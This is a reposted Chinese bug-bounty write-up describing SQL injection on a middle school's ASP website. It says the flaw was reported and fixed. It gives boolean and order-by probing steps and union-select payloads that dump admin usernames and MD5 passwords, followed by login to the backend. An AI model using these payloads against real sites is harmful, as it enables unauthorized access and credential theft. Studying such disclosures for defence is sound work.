• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

记一次挖edusrc漏洞挖掘sql注入

武飞扬头像
uyhacked
帮助1

在利用fofa收集信息的时候发现的,我这里直接开始挖洞部分写了。

前言:

目标是一个中学的站点,在一次挖洞过程中遇到个sql注入,漏洞已报送平台进行了修复。该文章仅用于交流学习,切勿利用相关信息非法测试,我也是刚入门的小白,欢迎各位大佬指点。

学新通

访问url/gywm.asp?id=95 and 1=1被拦截了(Wts-waf我这里利用了此文章

https://www.freebuf.com/articles/268726.html

学新通

url/gywm.asp?id=95 and 1=1的时候返回正常

学新通

url/gywm.asp?id=95 and 1=2时候返回空白页面

学新通

已确定存在sql注入漏洞;

开始使用order by获得表的列数

访问url/gywm.asp?id=95 order by 19-- 的时候页面正常的;

访问: url/gywm.asp?id=95 order by 20-- 的时候页面显示500

判断出列数为19,此时我们可以通过union联合查询进行注入。

  1.  
    Payload:
  2.  
    url/gywm.asp?id=95 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from admin

此时我们可知admin的位置所以我把猜出来的表和列名放在了3和10的位置, 这下就已拿到了这两列名中的值。

  1.  
     
  2.  
    Payload:
  3.  
    url/gywm.asp?id=95 union select 1,2,username,4,5,6,7,8,9,userpass,11,12,13,14,15,16,17,18,19 from admin
学新通

账户密码都爆出来了然后去把md5密码解密后直接进去后台渗透也到此结束

学新通
学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhgkegcb
系列文章
更多 icon
同类精品
更多 icon
继续加载